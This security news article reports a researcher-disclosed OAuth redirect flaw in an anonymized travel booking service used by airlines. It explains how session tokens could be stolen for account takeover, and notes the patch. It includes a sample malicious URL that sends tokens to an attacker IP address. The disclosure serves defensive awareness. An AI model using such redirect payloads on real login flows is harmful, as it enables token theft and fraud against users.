A vulnerability in a third-party travel service API has exposed millions of airline users to potential account takeovers, enabling attackers to exploit airline loyalty points and access sensitive personal information. 

The flaw, discovered by Salt Labs, highlights the risks associated with API supply chain integrations and underscores the need for stronger security measures in third-party service ecosystems.

The Vulnerability: Exploiting OAuth Redirects

The affected travel service, anonymized as “Acme Travel,” provides hotel and car rental booking solutions integrated into numerous commercial airline platforms. 

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

This integration allows users to book accommodations using their airline loyalty points. However, researchers identified a critical flaw in the OAuth authentication flow, specifically in the tr_returnUrl parameter.

In a normal login process:

• Users are redirected from the airline’s website (e.g., www.saltairlines.sec) to Acme Travel’s portal (e.g., acme.saltairlines.sec).
• Acme Travel generates an OAuth link and redirects users back to the airline’s site for authentication.
• Upon successful login, a session token containing sensitive parameters (tr_code and tr_id) is sent back to Acme Travel.

Attackers exploited this flow by manipulating the tr_returnUrl parameter to redirect these credentials to an attacker-controlled domain. For instance:

• Original URL: https://acme.saltairlines.sec/start?tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F
• Malicious URL: https://acme.saltairlines.sec/start?tr_returnUrl=http://142.93.164.25/evil

Once victims authenticated via the legitimate airline website, their session tokens were transmitted to the attacker’s server. These tokens allowed attackers to hijack accounts without further authentication.

“With this session token, the attacker can log into the system as the victim and perform actions on their behalf, including, of course, booking hotels and car rentals using nothing but the victim’s airline loyalty points”, researchers said.

Impact of the Attack

The implications of this vulnerability were severe:

• Account Takeover: Attackers could impersonate users, accessing personal information and loyalty point balances.
• Fraudulent Transactions: Unauthorized bookings for hotels and car rentals could be made using victims’ loyalty points.
• Data Exposure: Personally identifiable information (PII) stored in user accounts was at risk.

This attack was particularly insidious because it leveraged legitimate domains and manipulated only URL parameters, making detection via standard security measures like domain inspection or blocklists challenging.

Further, the incident highlights the growing threat of API supply chain attacks, where vulnerabilities in third-party integrations can compromise entire ecosystems. APIs often serve as trust bridges between services but can become weak links if security is not rigorously enforced.

Following coordinated disclosure by Salt Labs, the vulnerability has been patched. The travel service implemented stricter validation for redirect URLs to prevent unauthorized domains from receiving sensitive tokens.

Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar